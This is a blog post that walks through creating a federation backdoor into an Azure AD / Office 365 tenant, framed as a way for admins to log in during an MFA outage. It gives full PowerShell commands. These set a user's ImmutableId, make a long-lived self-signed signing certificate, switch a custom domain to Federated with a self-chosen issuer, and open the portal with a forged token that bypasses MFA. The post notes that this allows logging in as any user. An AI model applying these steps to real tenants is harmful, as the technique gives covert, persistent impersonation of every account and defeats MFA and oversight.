How to create a backdoor to Azure AD

How to create a backdoor to Azure AD

This Monday Azure AD MFA was down over 12 hours preventing users from logging in to Office 365. As MFA is usually mandatory for administrators by company policy, they couldn’t log in either. In this blog, I’ll show how to create a backdoor to Azure AD so you can log in and bypass MFA.

Microsoft has pushed organisations to use Azure AD Multi-Factor Authentication (MFA) to increase the security of their cloud offering. This Monday the MFA service was down worldwide for over 12 hours.

How can admins log in if something similar happens? The answer is: using a backdoor. Here is how to create one.

Note! In this blog, I’m using the AADInternals PowerShell module.

Prerequisities

The backdoor utilises a known identity federation vulnerability feature I blogged a year ago. To create a backdoor, you need:

  1. An admin user
  2. A custom domain
  3. A x509 certificate
  4. Identity Provider

An admin user

Naturally, the first needed thing is an administrator account. The backdoor requires that the account has an ImmutableID attribute set. If the account is synced from on-premises, the attribute contains a base64 encoded GUID of user’s on-prem AD object. If the account is not synced you need to set it manually. The value can be basically any string, as long as it is unique within the tenant.

To set the ImmutableId, use the following commands

# Get AccessToken
Get-AADIntAccessTokenForAADGraph

# Set the ImmutableId
Set-AADIntUser -UserPrincipalName "admin@company.onmicrosoft.com" -ImmutableId "AADBackdoor"

A custom domain

Next, you need a custom domain which can be converted to Federated. You can get one free from www.myo365.site

A certificate

The next needed part is a certificate. In Windows 10, you can easily create a self-signed certificate with PowerShell. If you are running older OS, you can use MakeCert.exe or OpenSSL to create the certificate.

You can also create a certificate online, but these are created by a third party and should NEVER be used in production.

Create a certificate with following PowerShell commands:

# Create a new self-signed certificate and add it to your personal store
$cert = New-SelfSignedCertificate -DnsName "backdoor.company.com" -CertStoreLocation "cert:\CurrentUser\My" -KeyExportPolicy Exportable -Provider "Microsoft Enhanced RSA and AES Cryptographic Provider" -NotAfter (Get-Date).AddYears(100)

# Save the password to a variable
$certPwd = ConvertTo-SecureString -String "password" -Force -AsPlainText

# Export the certificate to .pfx file
Export-PfxCertificate -Cert $cert -FilePath "c:\mycert.pfx" -Password $certPwd

# Remove the certificate from the personal store
Remove-Item "cert:\CurrentUser\my\$($cert.Thumbprint)"

Identity Provider

The last needed thing is an identity provider. In this blog, I use AADInternals PowerShell module, but any IdP supporting WS-FED protocol can be used, such as ADFS.

Create the backdoor

To create the backdoor, you need to set the authentication parameters of the chosen domain to match the IdP. For this, you need an Azure-wide unique issuer and the public key of the certificate.

# Extract the public key
$publicKey = [Convert]::ToBase64String($cert.Export("cert"))

# Set the issuer and login / logoff uri
$uri="http://backdoor.company.com/"

# Set the domain authentication info
Set-AADIntDomainAuthentication -DomainName "backdoor.company.com" -Authentication Federated -IssuerUri $uri -PassiveLogOnUri $uri -LogOffUri $uri -SigningCertificate $publicKey

And that’s it, the backdoor is created and you’re ready to open it!

# Load the certificate from .pfx file
$signingCert=Get-AADIntCertificate -FileName "c:\mycert.pfx" -Password "password"

# Create a html page and open it in a Internet Explorer InPrivate -session
Open-AADIntOffice365Portal -ImmutableId "AADBackdoor" -Issuer "http://backdoor.company.com" -Certificate $signingCert -ByPassMFA $true

You should now see the html page as below. Click the Login to Office 365 button to log in! You can also view the source code of the page to see what the SAML token contains.

screenshot

Afterword

Now you have a backdoor which you can use to access Office 365 - even if the MFA service is down. Conditional access may still block the access for other reasons.

Note! The backdoor allows you to log in as ANY USER of the tenant, as long as the user’s ImmutableId is known. So keep the certificate protected and safe!

Dr Nestori Syynimaa avatar
About Dr Nestori Syynimaa
Dr Syynimaa works as a CIO of eight cities and municipalities surrounding Tampere, the largest inland city in Nordic countries. He also runs his own consultation business Gerenios. Before moving to his current position, Dr Syynimaa worked as a consultant, trainer, and university lecturer for almost 20 years. He is a regular speaker on Office 365 and Azure security in scientific and professional conferences. Dr Syynimaa holds MCSA (Office 365) and is Microsoft Certified Trainer.
comments powered by Disqus